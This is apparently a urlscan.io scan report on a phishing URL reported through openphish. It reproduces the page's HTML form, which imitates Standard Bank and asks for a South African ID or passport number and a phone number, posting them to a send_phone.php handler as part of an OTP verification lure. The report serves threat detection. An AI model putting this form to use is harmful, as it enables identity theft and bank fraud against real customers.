hack2world.net
Open in
urlscan Pro
199.188.200.225
Malicious Activity!
Public Scan
URL:
https://hack2world.net/zack-world/gerfefff/xz-po/app/phone.php
Submission: On March 22 via automatic, source openphish — Scanned from DE
Submission: On March 22 via automatic, source openphish — Scanned from DE
Form analysis
1 forms found in the DOMPOST ../send/send_phone.php
<form class="panel ng-pristine ng-invalid ng-invalid-required ng-valid-pattern ng-valid-maxlength ng-valid-server-error ng-valid-minlength ng-valid-input-confirm ng-valid-expression ng-valid-exact-lengths" id="invitation-details-form"
data-frmcontainer="obb invitation details form" method="POST" action="../send/send_phone.php" autocomplete="off">
<section>
<div class="small-only-text-center grey-text"><span>Verification Required.</span></div>
</section>
<ng-switch on="operatorInvitationDetails.flow">
<section ng-switch-when="PMI" class="ng-scope">
<ibr-input name="identification" label="South African ID / Passport" ng-model="operatorInvitationDetails.invite.idNumber" ng-required="true" ng-maxlength="30" ng-pattern="^[a-zA-Z0-9]+$"
pattern-message="Please enter a valid South African ID number / Passport" class="ng-pristine ng-untouched ng-isolate-scope ng-empty ng-invalid ng-invalid-required ng-valid-pattern ng-valid-maxlength" required="required" style="">
<div class="text-input-container">
<label for="identification" ng-if="label" class="ng-binding ng-scope" style="">South African ID / Passport</label> <span ng-switch="tag"><span ng-switch-default="" class="ng-scope" style="">
<div class="input-currency-code-display input-group"><input class="ng-valid-exact-lengths" type="text" id="identification" name="identification" placeholder="" autocapitalize="off" ng-model="model.value" ng-required="ngRequired"
ng-trim="true" ng-maxlength="30" ng-pattern="^[a-zA-Z0-9]+$" ng-change="modelChanged()" ng-focus="ngFocus()" ng-blur="ngBlur()" exact-lengths="" input-confirm="" confirm-input-name="" show-hide-password="false" input-icon=""
input-icon-position="" input-icon-type="" input-icon-state="" prevent-consecutive-numbers="" server-error="" prevent-repetitive-numbers="" expression-validation="" minimum-number-validation="" maximum-number-validation=""
formatter="" ng-class="{'show-validation-styles': form[name].$touched || form[name].$dirty || form[name].$submitted}" required="required" autofocus="" style="border: 1px solid #72B13B;"></div>
</span></span>
<ng-messages for="form[name].$error" ng-hide="form[name].$pristine && !form[name].$touched && !validateOnLoad" class="ng-hide ng-active" style=""> </ng-messages><span ng-transclude=""></span>
</div>
</ibr-input>
<ibr-input name="referenceNumber" label="Phone Number" ng-model="operatorInvitationDetails.invite.referenceNumber" ng-required="true" ng-pattern="^[A-Za-z0-9]{13}$|^[A-Za-z0-9]{10}$"
pattern-message="Please enter a Phone Number of 10 or 13 characters in length" class="ng-pristine ng-untouched ng-isolate-scope ng-empty ng-invalid ng-invalid-required ng-valid-pattern" required="required" style="">
<div class="text-input-container">
<label for="referenceNumber" ng-if="label" class="ng-binding ng-scope" style="">Phone Number</label> <span ng-switch="tag"><span ng-switch-default="" class="ng-scope" style="">
<div class="input-currency-code-display input-group"><input class="ng-valid-exact-lengths" onkeypress="isInputNumber(event)" type="text" id="referenceNumber" name="phone" placeholder="" autocapitalize="off" ng-model="model.value"
ng-required="ngRequired" ng-trim="true" ng-focus="ngFocus()" ng-blur="ngBlur()" exact-lengths="" input-confirm="" confirm-input-name="" show-hide-password="false" input-icon="" input-icon-position="" input-icon-type=""
input-icon-state="" prevent-consecutive-numbers="" server-error="" prevent-repetitive-numbers="" expression-validation="" minimum-number-validation="" maximum-number-validation="" formatter=""
ng-class="{'show-validation-styles': form[name].$touched || form[name].$dirty || form[name].$submitted}" required="required" style="border: 1px solid #72B13B;"></div>
</span></span>
<ng-messages for="form[name].$error" ng-hide="form[name].$pristine && !form[name].$touched && !validateOnLoad" class="ng-hide ng-active" style=""> </ng-messages><span ng-transclude=""></span>
</div>
</ibr-input>
</section>
</ng-switch>
<ibr-button-group class="ng-isolate-scope">
<div>
<div class="right" ng-transclude="">
<ibr-button id="next-basic" color="primary" class="primary ng-scope ng-isolate-scope" ng-click="operatorInvitationDetails.decideFlow()" ng-disabled="!invitationDetailsForm.$valid" data-dtmid="link_content_next button"
data-dtmtext="Next button click" disabled="disabled">
<comp-lib-sb-button class="ibr-button" id="next-basic-button" color="primary" type="submit" width="none">
<button _ngcontent-hdx-c0="" class="primary primary__default none"
style="padding: 0 40px; color: #fff; background: #0033a1; height: 44px; font-size: 16px; line-height: 1.5; border-radius: 22px; font-family: BentonSans Medium; font-weight: 500; text-transform: uppercase;margin: .3571428571rem 0;">
<ng-transclude></ng-transclude>Next</button>
</comp-lib-sb-button>
</ibr-button>
<ibr-button id="cancel-basic" color="secondary" class="secondary ng-scope ng-isolate-scope" ng-click="operatorInvitationDetails.cancel()" data-dtmid="link_content_cancel button" data-dtmtext="Cancel button click">
<comp-lib-sb-button class="ibr-button" id="cancel-basic-button" color="secondary" type="button" width="none" ng-click="$ctrl.ngClick" ng-disabled="$ctrl.ngDisabled" data-dtmtext="Cancel button click" data-dtmid="link_content_cancel button"
track-click="" _nghost-hdx-c0="" ng-version="8.2.14">
<button _ngcontent-hdx-c0="" class="secondary secondary__default none" type="button" data-dtmtext="Cancel button click" data-dtmid="link_content_cancel button"
style="padding: 0 40px; color: #0033a1; background: #fff; border: 1px solid #0033a1; height: 44px; font-size: 16px; line-height: 1.5; border-radius: 22px; font-family: BentonSans Medium; font-weight: 500; text-transform: uppercase;">
<ng-transclude></ng-transclude>Cancel</button>
</comp-lib-sb-button>
</ibr-button>
</div>
</div>
</ibr-button-group>
</form>
Text Content
* PLEASE VERIFY THE FOLLOWING DETAILS LINKED TO YOUR ACCOUNT 1. Enter details 2. Accept / Decline 3. Enter OTP Verification Required. South African ID / Passport Phone Number Next Cancel Standard Bank is a licensed financial services provider in terms of the Financial Advisory and Intermediary Services Act and a registered credit provider in terms of the National Credit Act, registration number NCRCP15.